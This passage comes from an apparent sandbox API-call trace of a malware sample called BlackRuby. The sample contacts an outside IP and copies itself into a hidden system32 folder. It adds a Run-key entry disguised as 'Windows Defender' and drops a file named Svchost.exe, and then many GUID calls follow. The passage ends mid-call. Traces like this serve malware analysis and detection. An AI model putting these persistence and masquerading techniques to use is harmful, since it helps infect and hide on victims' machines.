lpcbBytesReturned=0x18ec08, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18ec08, lpOverlapped=0x0) returned -1 [0032.455] GetLastError () returned 0x2733 [0032.455] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x364560, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0032.455] GetLastError () returned 0x2733 [0032.455] WSAEventSelect (s=0x368, hEventObject=0x36c, lNetworkEvents=512) returned 0 [0032.455] GetLastError () returned 0x0 [0032.456] GetAdaptersAddresses () returned 0x6f [0032.460] LocalAlloc (uFlags=0x0, uBytes=0xa44) returned 0x39ef30 [0032.460] GetLastError () returned 0x0 [0032.460] GetAdaptersAddresses () returned 0x0 [0032.467] LocalFree (hMem=0x39ef30) returned 0x0 [0032.467] GetLastError () returned 0x0 [0032.472] WSAConnect (in: s=0x354, name=0x1b1aa98*(sa_family=2, sin_port=0x50, sin_addr="104.31.11.172"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0032.499] GetLastError () returned 0x0 [0032.500] closesocket (s=0x350) returned 0 [0032.500] GetLastError () returned 0x0 [0032.506] send (in: s=0x354, buf=0x1b1c40c*, len=68, flags=0 | out: buf=0x1b1c40c*) returned 68 [0032.507] GetLastError () returned 0x0 [0032.508] setsockopt (s=0x354, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0032.508] GetLastError () returned 0x0 [0032.508] recv (in: s=0x354, buf=0x1b17bb4, len=4096, flags=0 | out: buf=0x1b17bb4*) returned 664 [0032.620] GetLastError () returned 0x0 [0032.643] setsockopt (s=0x354, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0032.643] GetLastError () returned 0x0 [0032.644] SetEvent (hEvent=0x1b4) returned 1 [0032.644] GetLastError () returned 0x0 [0032.721] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.721] GetLastError () returned 0x0 [0032.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d58c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0032.721] GetLastError () returned 0x0 [0032.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\BlackRuby", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ef7c | out: phkResult=0x18ef7c*=0x0) returned 0x2 [0032.737] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\BlackRuby", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18ef30 | out: phkResult=0x18ef30*=0x0) returned 0x2 [0032.770] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\BlackRuby", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18ef3c, lpdwDisposition=0x18efcc | out: phkResult=0x18ef3c*=0x350, lpdwDisposition=0x18efcc*=0x1) returned 0x0 [0032.774] RegQueryValueExW (in: hKey=0x350, lpValueName="Install", lpReserved=0x0, lpType=0x18ef88, lpData=0x0, lpcbData=0x18ef84*=0x0 | out: lpType=0x18ef88*=0x0, lpData=0x0, lpcbData=0x18ef84*=0x0) returned 0x2 [0032.778] RegSetValueExW (in: hKey=0x350, lpValueName="Install", Reserved=0x0, dwType=0x1, lpData="Max", cbData=0x8 | out: lpData="Max") returned 0x0 [0032.778] RegCloseKey (hKey=0x350) returned 0x0 [0032.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18ef30 | out: phkResult=0x18ef30*=0x350) returned 0x0 [0032.779] RegQueryValueExW (in: hKey=0x350, lpValueName="Windows Defender", lpReserved=0x0, lpType=0x18ef88, lpData=0x0, lpcbData=0x18ef84*=0x0 | out: lpType=0x18ef88*=0x0, lpData=0x0, lpcbData=0x18ef84*=0x0) returned 0x2 [0032.779] RegSetValueExW (in: hKey=0x350, lpValueName="Windows Defender", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\system32\\BlackRuby\\WindowsUI.exe", cbData=0x58 | out: lpData="C:\\Windows\\system32\\BlackRuby\\WindowsUI.exe") returned 0x0 [0032.779] RegCloseKey (hKey=0x350) returned 0x0 [0033.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\BlackRuby", nBufferLength=0x105, lpBuffer=0x18eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\BlackRuby", lpFilePart=0x0) returned 0x1d [0033.210] GetLastError () returned 0x0 [0033.211] SetErrorMode (uMode=0x1) returned 0x0 [0033.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\BlackRuby" (normalized: "c:\\windows\\system32\\blackruby"), fInfoLevelId=0x0, lpFileInformation=0x18ef78 | out: lpFileInformation=0x18ef78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0033.211] GetLastError () returned 0x2 [0033.211] SetErrorMode (uMode=0x0) returned 0x1 [0033.211] SetErrorMode (uMode=0x1) returned 0x0 [0033.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18ef78 | out: lpFileInformation=0x18ef78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd3d8c770, ftLastAccessTime.dwHighDateTime=0x1d30235, ftLastWriteTime.dwLowDateTime=0xd3d8c770, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0033.212] GetLastError () returned 0x2 [0033.212] SetErrorMode (uMode=0x0) returned 0x1 [0033.212] SetErrorMode (uMode=0x1) returned 0x0 [0033.212] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x18ef78 | out: lpFileInformation=0x18ef78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc5361330, ftLastAccessTime.dwHighDateTime=0x1d30235, ftLastWriteTime.dwLowDateTime=0xc5361330, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0033.212] GetLastError () returned 0x2 [0033.212] SetErrorMode (uMode=0x0) returned 0x1 [0033.213] CreateDirectoryW (lpPathName="C:\\Windows\\system32\\BlackRuby" (normalized: "c:\\windows\\system32\\blackruby"), lpSecurityAttributes=0x0) returned 1 [0033.213] GetLastError () returned 0x2 [0033.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\BlackRuby", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\BlackRuby", lpFilePart=0x0) returned 0x1d [0033.217] GetLastError () returned 0x2 [0033.218] SetFileAttributesW (lpFileName="C:\\Windows\\system32\\BlackRuby", dwFileAttributes=0x2) returned 1 [0033.218] GetLastError () returned 0x2 [0033.230] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0033.230] GetLastError () returned 0x2 [0033.231] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0033.231] GetLastError () returned 0x2 [0033.232] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0033.232] GetLastError () returned 0x2 [0033.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\BlackRuby\\WindowsUI.exe", nBufferLength=0x105, lpBuffer=0x18eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\BlackRuby\\WindowsUI.exe", lpFilePart=0x0) returned 0x2b [0033.232] GetLastError () returned 0x2 [0033.233] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe" (normalized: "c:\\users\\eebsym5\\desktop\\defender.exe"), lpNewFileName="C:\\Windows\\system32\\BlackRuby\\WindowsUI.exe" (normalized: "c:\\windows\\system32\\blackruby\\windowsui.exe"), bFailIfExists=1) returned 1 [0033.248] GetLastError () returned 0x0 [0033.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", nBufferLength=0x105, lpBuffer=0x18ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", lpFilePart=0x0) returned 0x28 [0033.295] GetLastError () returned 0x0 [0033.295] SetErrorMode (uMode=0x1) returned 0x0 [0033.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config" (normalized: "c:\\users\\eebsym5\\desktop\\defender.config"), fInfoLevelId=0x0, lpFileInformation=0x18eeb4 | out: lpFileInformation=0x18eeb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0033.295] GetLastError () returned 0x2 [0033.295] SetErrorMode (uMode=0x0) returned 0x1 [0033.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\BlackRuby\\Svchost.exe", nBufferLength=0x105, lpBuffer=0x18ea20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\BlackRuby\\Svchost.exe", lpFilePart=0x0) returned 0x29 [0033.825] GetLastError () returned 0x3 [0033.825] SetErrorMode (uMode=0x1) returned 0x0 [0033.825] CreateFileW (lpFileName="C:\\Windows\\system32\\BlackRuby\\Svchost.exe" (normalized: "c:\\windows\\system32\\blackruby\\svchost.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x350 [0033.825] GetLastError () returned 0x0 [0033.825] GetFileType (hFile=0x350) returned 0x1 [0033.825] SetErrorMode (uMode=0x0) returned 0x1 [0033.825] GetFileType (hFile=0x350) returned 0x1 [0033.825] WriteFile (in: hFile=0x350, lpBuffer=0x2ba30a0*, nNumberOfBytesToWrite=0x5d600, lpNumberOfBytesWritten=0x18ef80, lpOverlapped=0x0 | out: lpBuffer=0x2ba30a0*, lpNumberOfBytesWritten=0x18ef80*=0x5d600, lpOverlapped=0x0) returned 1 [0033.832] GetLastError () returned 0x0 [0033.832] CloseHandle (hObject=0x350) returned 1 [0033.835] GetLastError () returned 0x0 [0043.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\BlackRuby\\Svchost.exe", nBufferLength=0x105, lpBuffer=0x18eb38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\BlackRuby\\Svchost.exe", lpFilePart=0x0) returned 0x29 [0043.840] GetLastError () returned 0x0 [0043.840] SetErrorMode (uMode=0x1) returned 0x0 [0043.840] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\BlackRuby\\Svchost.exe" (normalized: "c:\\windows\\system32\\blackruby\\svchost.exe"), fInfoLevelId=0x0, lpFileInformation=0x18efb8 | out: lpFileInformation=0x18efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c609920, ftCreationTime.dwHighDateTime=0x1d39df7, ftLastAccessTime.dwLowDateTime=0x1c609920, ftLastAccessTime.dwHighDateTime=0x1d39df7, ftLastWriteTime.dwLowDateTime=0x1c609920, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5d600)) returned 1 [0043.840] GetLastError () returned 0x0 [0043.840] SetErrorMode (uMode=0x0) returned 0x1 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa51ece29, Data2=0xf9b1, Data3=0x49cf, Data4=([0]=0xa0, [1]=0x98, [2]=0x3, [3]=0xf7, [4]=0x3c, [5]=0x12, [6]=0x3d, [7]=0x2f))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8f3e57dc, Data2=0x53d2, Data3=0x4f27, Data4=([0]=0x80, [1]=0x6d, [2]=0x98, [3]=0xfc, [4]=0xa5, [5]=0x73, [6]=0xd4, [7]=0xdb))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5b6c04e7, Data2=0x2391, Data3=0x427b, Data4=([0]=0x8a, [1]=0xc7, [2]=0x69, [3]=0xd3, [4]=0x66, [5]=0x0, [6]=0x25, [7]=0x75))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x683617e7, Data2=0x1699, Data3=0x496f, Data4=([0]=0xba, [1]=0x91, [2]=0xc1, [3]=0xb5, [4]=0x3b, [5]=0xd9, [6]=0x21, [7]=0x15))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc036da8b, Data2=0x3a47, Data3=0x4140, Data4=([0]=0xb4, [1]=0x63, [2]=0x1d, [3]=0x47, [4]=0x17, [5]=0x57, [6]=0x60, [7]=0x83))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1004eeb6, Data2=0xd8bd, Data3=0x4622, Data4=([0]=0x87, [1]=0xf2, [2]=0x27, [3]=0x2f, [4]=0x43, [5]=0x5c, [6]=0x6b, [7]=0x49))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc8dff41b, Data2=0xa495, Data3=0x49e7, Data4=([0]=0xa8, [1]=0x50, [2]=0x5e, [3]=0x53, [4]=0x3c, [5]=0xcb, [6]=0x3d, [7]=0xd6))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8ce94f94, Data2=0xa87d, Data3=0x4d6a, Data4=([0]=0xbc, [1]=0xc4, [2]=0x68, [3]=0xe0, [4]=0x7c, [5]=0xa, [6]=0x43, [7]=0x4d))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe26c724, Data2=0x3da4, Data3=0x4ff0, Data4=([0]=0xb9, [1]=0xb4, [2]=0x51, [3]=0x8e, [4]=0x5c, [5]=0xb8, [6]=0x74, [7]=0x2d))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe1149329, Data2=0x9119, Data3=0x46a3, Data4=([0]=0xaf, [1]=0xfd, [2]=0x87, [3]=0x5e, [4]=0xb7, [5]=0x53, [6]=0x37, [7]=0x23))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x854d9a42, Data2=0x65f2, Data3=0x44c1, Data4=([0]=0x90, [1]=0xfa, [2]=0x1e, [3]=0x25, [4]=0xbd, [5]=0xe4, [6]=0x65, [7]=0x4f))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xef57925d, Data2=0x8dc0, Data3=0x416a, Data4=([0]=0xb4, [1]=0x4f, [2]=0xcc, [3]=0x7c, [4]=0x65, [5]=0x3d, [6]=0xbc, [7]=0xd1))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd1da01e6, Data2=0x4e95, Data3=0x4ea6, Data4=([0]=0x89, [1]=0x24, [2]=0xd6, [3]=0x33, [4]=0x21, [5]=0xad, [6]=0x35, [7]=0x66))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf40eb7fe, Data2=0x5393, Data3=0x4591, Data4=([0]=0x84, [1]=0x8e, [2]=0x0, [3]=0x35, [4]=0x54, [5]=0x1d, [6]=0x83, [7]=0xbf))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x52c79ed4, Data2=0xf695, Data3=0x41c8, Data4=([0]=0xbf, [1]=0xf2, [2]=0x69, [3]=0xa6, [4]=0x9c, [5]=0xcb, [6]=0xcb, [7]=0x1f))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x59d12200, Data2=0x90f4, Data3=0x46df, Data4=([0]=0xbb, [1]=0xe9, [2]=0xdb, [3]=0x8a, [4]=0x91, [5]=0x5b, [6]=0xc5, [7]=0x17))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x81f82e0a, Data2=0xf3bf, Data3=0x4f67, Data4=([0]=0xb2, [1]=0x25, [2]=0xdf, [3]=0xef, [4]=0x88, [5]=0x2d, [6]=0xfd, [7]=0x57))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7367aaf4, Data2=0x8a58, Data3=0x4412, Data4=([0]=0xb1, [1]=0x13, [2]=0x5f, [3]=0x2a, [4]=0x7e, [5]=0x3f, [6]=0xe4, [7]=0xe2))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x198647e0, Data2=0x1d53, Data3=0x4b7c, Data4=([0]=0x90, [1]=0xa5, [2]=0xc5, [3]=0x11, [4]=0x27, [5]=0x30, [6]=0xfe, [7]=0xa6))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x70984baa, Data2=0x7403, Data3=0x4496, Data4=([0]=0xb0, [1]=0xdc, [2]=0x9c, [3]=0xd0, [4]=0x16, [5]=0xac, [6]=0x60, [7]=0x51))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x64e81397, Data2=0xe783, Data3=0x4ce4, Data4=([0]=0x8f, [1]=0x90, [2]=0xf6, [3]=0xcf, [4]=0xf2, [5]=0x7f, [6]=0xdc, [7]=0x49))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6792ed73, Data2=0xcf73, Data3=0x4f79, Data4=([0]=0xa8, [1]=0x64, [2]=0xe8, [3]=0x4f, [4]=0xce, [5]=0xe3, [6]=0xb2, [7]=0xe0))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe9d8966e, Data2=0x3145, Data3=0x413d, Data4=([0]=0xa0, [1]=0x15, [2]=0xec, [3]=0x7, [4]=0x98, [5]=0x52, [6]=0x2f, [7]=0x14))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6746b5c0, Data2=0x9c59, Data3=0x4bc9, Data4=([0]=0x92, [1]=0x7e, [2]=0x8f, [3]=0xf6, [4]=0x1e, [5]=0xe9, [6]=0x71, [7]=0x5))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8aac0525, Data2=0x2daa, Data3=0x4277, Data4=([0]=0xa8, [1]=0x92, [2]=0x8d, [3]=0x2f, [4]=0xa4, [5]=0x1e, [6]=0xc4, [7]=0xb2))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe6c08ef6, Data2=0x4dac, Data3=0x483d, Data4=([0]=0x87, [1]=0x8f, [2]=0x8b, [3]=0xa0, [4]=0xbb, [5]=0xce, [6]=0x72, [7]=0x3f))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x3bef0d4b, Data2=0x3561, Data3=0x4bc4, Data4=([0]=0xb2, [1]=0xce, [2]=0x98, [3]=0xfb, [4]=0xfd, [5]=0xd3, [6]=0xa2, [7]=0x17))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xcb9b1335, Data2=0x365a, Data3=0x4b0c, Data4=([0]=0x8e, [1]=0xa5, [2]=0x28, [3]=0xb0, [4]=0x8c, [5]=0xbe, [6]=0x2c, [7]=0x52))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd2cbfd9b, Data2=0xa87c, Data3=0x41ea, Data4=([0]=0x9d, [1]=0xe, [2]=0xd7, [3]=0x43, [4]=0xc5, [5]=0x51, [6]=0xa2, [7]=0xd0))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf5335b3b, Data2=0xf8bb, Data3=0x4fc8, Data4=([0]=0x95, [1]=0xc5, [2]=0x73, [3]=0x81, [4]=0x2b, [5]=0x8c, [6]=0x35, [7]=0xbb))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7f9b6d22, Data2=0x7277, Data3=0x4a97, Data4=([0]=0x94, [1]=0x36, [2]=0x1c, [3]=0xad, [4]=0xd, [5]=0xbd, [6]=0x98, [7]=0x21))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xdebde36e, Data2=0x56b, Data3=0x4be4, Data4=([0]=0x8d, [1]=0x1f, [2]=0x6f, [3]=0x3a, [4]=0x77, [5]=0xf0, [6]=0x9b, [7]=0x10))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7878ed64, Data2=0xa141, Data3=0x458b, Data4=([0]=0xb2, [1]=0xf0, [2]=0xb3, [3]=0xd1, [4]=0xac, [5]=0x6, [6]=0x59, [7]=0x8f))) returned 0x0 [0044.313] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1fae5488, Data2=0x2aa9, Data3=0x4eee, Data4=([0]=0xaf, [1]=0x2a, [2]=0x7e, [3]=0x74, [4]=0xac, [5]=0xb6, [6]=0xcf, [7]=0xbf))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6277df98, Data2=0xb86e, Data3=0x4794, Data4=([0]=0x86, [1]=0x3a, [2]=0x27, [3]=0x35, [4]=0x80, [5]=0xe3, [6]=0xf8, [7]=0xe5))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd3032f34, Data2=0x4223, Data3=0x4aa3, Data4=([0]=0xbb, [1]=0x46, [2]=0xb2, [3]=0x52, [4]=0x4c, [5]=0x7c, [6]=0x47, [7]=0xdd))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x95af7cfb, Data2=0x7ed9, Data3=0x40a2, Data4=([0]=0x82, [1]=0x93, [2]=0x7f, [3]=0xc2, [4]=0xc0, [5]=0x4b, [6]=0xed, [7]=0x56))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc3d874e4, Data2=0xfdf7, Data3=0x4306, Data4=([0]=0xbb, [1]=0xcb, [2]=0x5, [3]=0xad, [4]=0xc5, [5]=0x30, [6]=0x5e, [7]=0x4e))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe1334074, Data2=0x6649, Data3=0x456d, Data4=([0]=0x9e, [1]=0x8, [2]=0xf7, [3]=0x70, [4]=0x58, [5]=0xaa, [6]=0xa0, [7]=0x1b))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x183a054b, Data2=0xfa4b, Data3=0x4fbe, Data4=([0]=0xba, [1]=0xfc, [2]=0x42, [3]=0xf5, [4]=0xa0, [5]=0x49, [6]=0x13, [7]=0x91))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x38ebeacc, Data2=0xdfb0, Data3=0x487e, Data4=([0]=0x96, [1]=0xf2, [2]=0x57, [3]=0xd7, [4]=0x5f, [5]=0xea, [6]=0xd, [7]=0xd1))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x70818157, Data2=0xcbb3, Data3=0x4add, Data4=([0]=0x9b, [1]=0x2c, [2]=0xcd, [3]=0x5c, [4]=0x5, [5]=0xb1, [6]=0xc7, [7]=0x53))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc7d4341, Data2=0x4ff8, Data3=0x4db8, Data4=([0]=0xa2, [1]=0x86, [2]=0x1, [3]=0x37, [4]=0x1b, [5]=0xb2, [6]=0xd1, [7]=0xe7))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1f70e961, Data2=0x8d50, Data3=0x45cf, Data4=([0]=0xa3, [1]=0xef, [2]=0xba, [3]=0x2c, [4]=0xc9, [5]=0xc0, [6]=0xe8, [7]=0x32))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5fc7207c, Data2=0x549c, Data3=0x4d64, Data4=([0]=0x92, [1]=0xe7, [2]=0xb7, [3]=0x64, [4]=0xa9, [5]=0xe7, [6]=0x24, [7]=0x4b))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xcc8643fd, Data2=0x66c7, Data3=0x44ad, Data4=([0]=0xa4, [1]=0x7c, [2]=0xf3, [3]=0xc5, [4]=0xc9, [5]=0x69, [6]=0x37, [7]=0x8e))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x40cc637b, Data2=0x5cae, Data3=0x45c3, Data4=([0]=0xb4, [1]=0x22, [2]=0x52, [3]=0x69, [4]=0x4d, [5]=0x23, [6]=0xc8, [7]=0xe9))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd68326ff, Data2=0xcc7d, Data3=0x4fc5, Data4=([0]=0xa3, [1]=0x7e, [2]=0x78, [3]=0x33, [4]=0xeb, [5]=0x57, [6]=0xc, [7]=0x2a))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x2553ace7, Data2=0xdeb6, Data3=0x4669, Data4=([0]=0xb9, [1]=0xaf, [2]=0x6d, [3]=0x68, [4]=0xd8, [5]=0x14, [6]=0xdf, [7]=0xac))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x49e7fab1, Data2=0xc536, Data3=0x4a87, Data4=([0]=0x98, [1]=0x81, [2]=0x3b, [3]=0x5c, [4]=0xf1, [5]=0x20, [6]=0x63, [7]=0x1d))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc4ed15d, Data2=0x2c86, Data3=0x414d, Data4=([0]=0xa5, [1]=0xcd, [2]=0x7a, [3]=0x8f, [4]=0x46, [5]=0x1e, [6]=0xa5, [7]=0x4a))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1bb67387, Data2=0x3693, Data3=0x4c8a, Data4=([0]=0x85, [1]=0xd8, [2]=0x38, [3]=0xc3, [4]=0x4d, [5]=0x18, [6]=0x37, [7]=0x41))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7cfa0436, Data2=0xe66b, Data3=0x4ed4, Data4=([0]=0x8d, [1]=0xd2, [2]=0x8b, [3]=0x43, [4]=0xcd, [5]=0xcf, [6]=0x67, [7]=0xf2))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb8159274, Data2=0xafa1, 